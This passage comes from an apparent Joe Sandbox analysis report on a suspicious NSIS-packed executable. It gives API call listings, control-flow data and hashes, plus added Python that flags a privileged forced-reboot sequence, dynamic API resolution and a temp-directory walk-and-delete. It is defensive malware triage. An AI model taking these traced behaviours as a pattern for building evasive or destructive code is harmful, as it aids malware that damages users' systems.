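    reason_names = [n for bit, n in REASON_FLAGS.items() if reason & bit]
    major, minor = reason & 0x00FF0000, reason & 0x0000FFFF
    reason_names.append(REASON_MAJOR.get(major, "major=%#x" % major))
    reason_names.append(REASON_MINOR.get(minor, "minor=%#x" % minor))
    return flag_names, reason_names


def find_privileged_reboot(calls: List[ApiCall]) -> Optional[Tuple[str, List[str], List[str]]]:
    """First ExitWindowsEx that follows a SeShutdownPrivilege lookup and
    AdjustTokenPrivileges, as (call site, flag names, reason names); else None."""
    stage = 0
    for c in calls:
        if stage == 0 and c.api == "LookupPrivilegeValueW" and "SeShutdownPrivilege" in c.args:
            stage = 1
        elif stage == 1 and c.api == "AdjustTokenPrivileges":
            stage = 2
        elif stage == 2 and c.api == "ExitWindowsEx" and len(c.args) >= 2:
            flag_names, reason_names = decode_exit_windows_ex(c.args)
            return c.ref, flag_names, reason_names
    return None


LOADERS = {"LoadLibraryW", "LoadLibraryA", "GetModuleHandleW", "GetModuleHandleA"}


def find_dynamic_resolution(calls: List[ApiCall]) -> List[str]:
    """Call sites of every GetProcAddress that comes after a module load/lookup."""
    seen_loader, hits = False, []
    for c in calls:
        if c.api in LOADERS:
            seen_loader = True
        elif c.api == "GetProcAddress" and seen_loader:
            hits.append(c.ref)
    return hits


# Sample input: lines copied from the two listings in this report.
LISTING_REBOOT = r"""
• GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403820
• OpenProcessToken.ADVAPI32(00000000), ref: 00403827
• LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040383C
• AdjustTokenPrivileges.ADVAPI32 ref: 0040385F
• ExitWindowsEx.USER32(00000002,80040002), ref: 00403884
• ExitProcess.KERNEL32 ref: 004038A7
"""
LISTING_DYNRESOLVE = r"""
  • Part of subcall function 6E9B121B: GlobalAlloc.KERNELBASE(00000040,?,6E9B123B,?,6E9B12DF,00000019,6E9B11BE,-000000A0), ref: 6E9B1225
• GetModuleHandleW.KERNEL32(00000008), ref: 6E9B21B9
• LoadLibraryW.KERNEL32(00000008), ref: 6E9B21CA
• GetProcAddress.KERNEL32(?,?), ref: 6E9B2224
"""

if __name__ == "__main__":
    print(find_privileged_reboot(parse_listing(LISTING_REBOOT)))
    print(find_dynamic_resolution(parse_listing(LISTING_DYNRESOLVE)))
```

Matching the reboot as an ordered sequence inside one function's listing, rather than on the presence of ExitWindowsEx alone, keeps the finding tied to the code that actually holds the privilege: here the call sites sit in the same function as the "NSIS Error", "Error launching installer" and "~nsu" strings, so the reboot signature in the overview is accounted for at least by the installer stub rather than only by the unpacked payload.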

Control-flow Graph

control_flow_graph 719 4059a9-4059cf call 405c74 722 4059d1-4059e3 DeleteFileW 719->722 723 4059e8-4059ef 719->723 724 405b65-405b69 722->724 725 4059f1-4059f3 723->725 726 405a02-405a12 call 406297 723->726 728 405b13-405b18 725->728 729 4059f9-4059fc 725->729 732 405a21-405a22 call 405bb8 726->732 733 405a14-405a1f lstrcatW 726->733 728->724 731 405b1a-405b1d 728->731 729->726 729->728 734 405b27-405b2f call 4065da 731->734 735 405b1f-405b25 731->735 736 405a27-405a2b 732->736 733->736 734->724 743 405b31-405b45 call 405b6c call 405961 734->743 735->724 739 405a37-405a3d lstrcatW 736->739 740 405a2d-405a35 736->740 742 405a42-405a5e lstrlenW FindFirstFileW 739->742 740->739 740->742 744 405a64-405a6c 742->744 745 405b08-405b0c 742->745 759 405b47-405b4a 743->759 760 405b5d-405b60 call 4052ff 743->760 748 405a8c-405aa0 call 406297 744->748 749 405a6e-405a76 744->749 745->728 747 405b0e 745->747 747->728 761 405aa2-405aaa 748->761 762 405ab7-405ac2 call 405961 748->762 751 405a78-405a80 749->751 752 405aeb-405afb FindNextFileW 749->752 751->748 757 405a82-405a8a 751->757 752->744 756 405b01-405b02 FindClose 752->756 756->745 757->748 757->752 759->735 763 405b4c-405b5b call 4052ff call 40605d 759->763 760->724 761->752 764 405aac-405ab5 call 4059a9 761->764 772 405ae3-405ae6 call 4052ff 762->772 773 405ac4-405ac7 762->773 763->724 764->752 772->752 776 405ac9-405ad9 call 4052ff call 40605d 773->776 777 405adb-405ae1 773->777 776->752 777->752
APIs
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 004059D2
• lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A1A
• lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A3D
• lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A43
• FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A53
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
• FindClose.KERNEL32(00000000), ref: 00405B02
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
• String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$(?z$C:\Users\user\AppData\Local\Temp\$\*.*
• API String ID: 2035342205-398219656
• Opcode ID: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
• Instruction ID: 8b5db7531a0f4bb83586dba503ceccc8cbbd7972abfd892cd346515476ce1415
• Opcode Fuzzy Hash: 4d5656c0894c7074968c07a7ddfc43275556ff456bdda599b280e6413b0d544d
• Instruction Fuzzy Hash: 7D41D830900918A6CF21AB65CC89ABF7678EF82718F14827FF801B11C1D77C5985DE6E

Control-flow Graph
(Rendered graph not reproduced; node data only.) Function 004065DA-004065FE. Calls by basic block: 4065da FindFirstFileW; 4065f0 FindClose on one branch, bypassed via 4065fb on the other; both rejoin at 4065fd.
APIs
• FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
• FindClose.KERNEL32(00000000), ref: 004065F1
Strings
• pOz, xrefs: 004065DB
• C:\Users\user\AppData\Local\Temp\nse865B.tmp, xrefs: 004065DA
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID: C:\Users\user\AppData\Local\Temp\nse865B.tmp$pOz
• API String ID: 2295610775-830374354
• Opcode ID: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
• Instruction ID: b37c022bec08382a0cb03c9db181d2efdea8b1f21deeb05207148622359d6313
• Opcode Fuzzy Hash: e01e7619722b9f30efb83f7659fa0d40dd2a6717423703156fa95c420c1e82c9
• Instruction Fuzzy Hash: EFD01231519020AFC2001B38BD0C84B7A589F463307158B3AB4A6F11E4CB788C6296A9
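
The "APIs" listings for the function at 0x4059a9 (lstrcatW with \*.*, a FindFirstFileW/FindNextFileW/FindClose loop, DeleteFileW, and a recursive self-call in its graph) and for the function at 0x4065da (FindFirstFileW followed directly by FindClose on C:\Users\user\AppData\Local\Temp\nse865B.tmp, the usual file-exists idiom) share one line format. The Python below is an added example, not Joe Sandbox code and not part of this report: it parses that format, checks that every call site lies inside the function range the control-flow graph reports, extracts Temp-directory paths passed as arguments, and labels the file-system pattern each function shows. The sample lines are copied from the two listings above; the label names ("directory enumeration loop", "path-existence probe", "walk-and-delete") and the Temp-path substring are this example's own choices.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report and label
file-system walk/delete patterns. Added example, not Joe Sandbox code; the
sample lines are copied from the report, the pattern labels are this example's own."""
import re
from dataclasses import dataclass

# One listing line: "<Api>.<Module>(<args>), ref: <hex call site>".
# The parenthesised argument list is optional (the report prints
# "DestroyWindow.USER32 ref: 00403DA2" without one).
API_LINE = re.compile(
    r"^(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{6,8})\s*$"
)

@dataclass
class ApiCall:
    api: str
    module: str
    args: list
    ref: int   # address of the call instruction (the "ref:" value)

def parse_api_lines(text):
    """Return an ApiCall for every line that matches the listing format."""
    calls = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("\u2022").strip()  # drop the bullet glyph
        m = API_LINE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("module"),
            args=[a.strip() for a in args.split(",")] if args else [],
            ref=int(m.group("ref"), 16),
        ))
    return calls

def refs_within(calls, lo, hi):
    """True if every call site lies in [lo, hi], e.g. the function's CFG range."""
    return all(lo <= c.ref <= hi for c in calls)

def temp_paths(calls):
    """Sorted set of argument values that point into the user's Temp directory
    (substring chosen for this report's sandbox user profile; an assumption)."""
    needle = "\\AppData\\Local\\Temp\\"
    return sorted({a for c in calls for a in c.args if needle in a})

def classify(calls):
    """Label the file-system behaviour visible in one function's call set."""
    apis = {c.api for c in calls}
    joined = " ".join(a for c in calls for a in c.args)
    labels = []
    if {"FindFirstFileW", "FindNextFileW", "FindClose"} <= apis:
        labels.append("directory enumeration loop")
        if "\\*.*" in joined:
            labels.append("wildcard listing (\\*.*)")
    elif {"FindFirstFileW", "FindClose"} <= apis:
        labels.append("path-existence probe")   # the usual file-exists idiom
    if "DeleteFileW" in apis:
        labels.append("file deletion")
    if "directory enumeration loop" in labels and "file deletion" in labels:
        labels.append("walk-and-delete")
    return labels

# Listing of the function at 0x4059a9, copied from the report.
SAMPLE_4059A9 = r"""
• DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 004059D2
• lstrcatW.KERNEL32(007A3F28,\*.*,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A1A
• lstrcatW.KERNEL32(?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A3D
• lstrlenW.KERNEL32(?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A43
• FindFirstFileW.KERNEL32(007A3F28,?,?,?,0040A014,?,007A3F28,?,?,C:\Users\user\AppData\Local\Temp\,76233420,00000000), ref: 00405A53
• FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AF3
• FindClose.KERNEL32(00000000), ref: 00405B02
"""

# Listing of the function at 0x4065da, copied from the report.
SAMPLE_4065DA = r"""
• FindFirstFileW.KERNELBASE(?,007A4F70,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00405CBD,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,00000000,C:\Users\user\AppData\Local\Temp\nse865B.tmp,C:\Users\user\AppData\Local\Temp\nse865B.tmp,?,?,76233420,004059C9,?,C:\Users\user\AppData\Local\Temp\,76233420), ref: 004065E5
• FindClose.KERNEL32(00000000), ref: 004065F1
"""

if __name__ == "__main__":
    for name, sample, lo, hi in (("0x4059a9", SAMPLE_4059A9, 0x4059A9, 0x405B69),
                                 ("0x4065da", SAMPLE_4065DA, 0x4065DA, 0x4065FE)):
        calls = parse_api_lines(sample)
        print(name, [c.api for c in calls], classify(calls),
              "refs in CFG range:", refs_within(calls, lo, hi), temp_paths(calls))
```

Run directly, it prints the parsed calls and labels for both listings. The walk-and-delete label on 0x4059a9, together with the recursive self-call at 405aac in its graph, is what separates a temp-directory cleanup routine from a single-file delete, and the range check ties each "ref:" address back to the function the graph claims it belongs to. The same parser runs unchanged over the other function listings in this report.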

Control-flow Graph
(Rendered graph not reproduced; node data only.) Function 00403D35-004041E4. Calls by basic block: 403d64 SetWindowPos; 403d7c ShowWindow; 403d9c DestroyWindow; 403dbb SetWindowLongW; 403dd8 GetDlgItem; 403deb SendMessageW, IsWindowEnabled; 403e30 call 40140b; 403e3e call 4041e7; 403e45 call 40140b; 403e5c SendMessageW; 403e75 call 404275; 403e99 GetDlgItem (x2), call 40420e, SetClassLongW, call 40140b; 403f02 call 401389; 403f0f SendMessageW; 403f3b call 40425a; 403f62 call 40140b; 403f86 call 4062b9, call 40420e (x3), GetDlgItem; 403fdd ShowWindow, KiUserCallbackDispatcher, call 404230, EnableWindow; 404020 GetSystemMenu, EnableMenuItem, SendMessageW; 404050 SendMessageW; 404069 call 404243, call 403d16, call 406297, lstrlenW, call 4062b9, SetWindowTextW, call 401389; 4040d9 DestroyWindow; 4040f3 CreateDialogParamW; 404126 call 40420e, GetDlgItem, GetWindowRect, ScreenToClient, SetWindowPos, call 401389; 40417f ShowWindow, call 40425a; 404199 DestroyWindow, EndDialog; 4041c8 ShowWindow.
APIs
• SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D71
• ShowWindow.USER32(?), ref: 00403D8E
• DestroyWindow.USER32 ref: 00403DA2
• SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DBE
• GetDlgItem.USER32(?,?), ref: 00403DDF
• SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403DF3
• IsWindowEnabled.USER32(00000000), ref: 00403DFA
• GetDlgItem.USER32(?,00000001), ref: 00403EA8
• GetDlgItem.USER32(?,00000002), ref: 00403EB2
• SetClassLongW.USER32(?,000000F2,?), ref: 00403ECC
• SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F1D
• GetDlgItem.USER32(?,00000003), ref: 00403FC3
• ShowWindow.USER32(00000000,?), ref: 00403FE4
• KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403FF6
• EnableWindow.USER32(?,?), ref: 00404011
• GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404027
• EnableMenuItem.USER32(00000000), ref: 0040402E
• SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404046
• SendMessageW.USER32(?,00000401,00000002,00000000), ref: 00404059
• lstrlenW.KERNEL32(007A1F20,?,007A1F20,00000000), ref: 00404083
• SetWindowTextW.USER32(?,007A1F20), ref: 00404097
• ShowWindow.USER32(?,0000000A), ref: 004041CB
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
• String ID:
• API String ID: 3282139019-0
• Opcode ID: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
• Instruction ID: db2580999c41c4fe450d1ee4fd1a55221d51bf0aef153e7307bc2b2ec56299a6
• Opcode Fuzzy Hash: 47aca452d897ee1c606fef890413e6cfedcb511d419741730bd760ecf5135d2d
• Instruction Fuzzy Hash: 3FC1DEB2504200AFDB206F61ED48E2B3AA8EB9A745F01453FF651B11F0CB399991DB5E

Control-flow Graph
(interactive graph not preserved; basic blocks of this function begin at 00403987)
APIs
  • Part of subcall function 00406671: GetModuleHandleA.KERNEL32(?,00000020,?,004033DE,0000000A), ref: 00406683
  • Part of subcall function 00406671: GetProcAddress.KERNEL32(00000000,?), ref: 0040669E
• GetUserDefaultUILanguage.KERNELBASE(00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000), ref: 004039A1
  • Part of subcall function 004061DE: wsprintfW.USER32 ref: 004061EB
• lstrcatW.KERNEL32(1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76233420,"C:\Users\user\Desktop\MC8017774DOCS.exe",00000000), ref: 00403A08
• lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A88
• lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A9B
• GetFileAttributesW.KERNEL32(Call), ref: 00403AA6
• LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne), ref: 00403AEF
• RegisterClassW.USER32(007A79C0), ref: 00403B2C
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B44
• CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B79
• ShowWindow.USER32(00000005,00000000), ref: 00403BAF
• GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BDB
• GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BE8
• RegisterClassW.USER32(007A79C0), ref: 00403BF1
• DialogBoxParamW.USER32(?,00000000,00403D35,00000000), ref: 00403C10
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Class$Info$RegisterWindow$AddressAttributesCreateDefaultDialogFileHandleImageLanguageLoadModuleParamParametersProcShowSystemUserlstrcatlstrcmpilstrlenwsprintf
• String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
• API String ID: 606308-1472972687
• Opcode ID: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
• Instruction ID: fbef4646fbcf09e2f3785bbd11e1a9055ea34cd93d2d0ed92f9d0f486109358d
• Opcode Fuzzy Hash: d8c6d654d8461c0bab771826e12c99a28648eabf0d3796c1ab225da277d58302
• Instruction Fuzzy Hash: 4D61B434200700AED320AF669D45F2B3A6CEB86745F40857FF941B51E2DB7D6901CB2D

Control-flow Graph
(interactive graph not preserved; basic blocks of this function begin at 00402EDD)
APIs
• GetTickCount.KERNEL32 ref: 00402EEE
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\MC8017774DOCS.exe,00000400,?,00000006,00000008,0000000A), ref: 00402F0A
  • Part of subcall function 00405D8D: GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
  • Part of subcall function 00405D8D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
• GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\MC8017774DOCS.exe,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: File$AttributesCountCreateModuleNameSizeTick
• String ID: "C:\Users\user\Desktop\MC8017774DOCS.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\MC8017774DOCS.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
• API String ID: 4283519449-3890393539
• Opcode ID: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
• Instruction ID: 6efc7070ea8ae83888cd6b0cd51e2fb70848d81e0c864f736895acd6ba0a04dc
• Opcode Fuzzy Hash: 3805bf358c9b933ceb9c43f9a1800ffe54feec6963a992abd6a8fc7691be1b71
• Instruction Fuzzy Hash: 6251C271901208ABDB20AF65DD85BAE7FA8EB05355F10807BF904B62D5DB7C8E408B9D

Control-flow Graph
(interactive graph not preserved; basic blocks of this function begin at 004062B9)
APIs
• GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063FA
• GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 0040640D
• SHGetSpecialFolderLocation.SHELL32(00405336,007924D8,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 00406449
• SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 00406457
• CoTaskMemFree.OLE32(007924D8), ref: 00406462
• lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406488
• lstrlenW.KERNEL32(Call,00000000,007A0F00,?,00405336,007A0F00,00000000), ref: 004064E0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
Similarity
• API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
• String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
• API String ID: 717251189-1230650788
• Opcode ID: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
• Instruction ID: 404aa91c63c37ecb41bc9170075bd2a6d7acde9a16fb3e5716bfaea1f71b207e
• Opcode Fuzzy Hash: 6a252e7cfe045f166905b36660472e7fa3fa999564b1f12889f2762da509e16d
• Instruction Fuzzy Hash: C0613671A00511ABDF209F24DD40ABE37A5AF45314F12813FE943BA2D0EB3C99A1CB5D

Control-flow Graph: function starting at 40176f (executed / not-executed node graph not reproduced in text)
APIs
• lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017B0
• CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,?,00000031), ref: 004017D5
  • Part of subcall function 00406297: lstrcpynW.KERNEL32(?,?,00000400,0040343D,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 004062A4
  • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
  • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,762323A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
  • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,762323A0), ref: 0040535A
  • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
  • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
  • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
Strings
Memory Dump Source
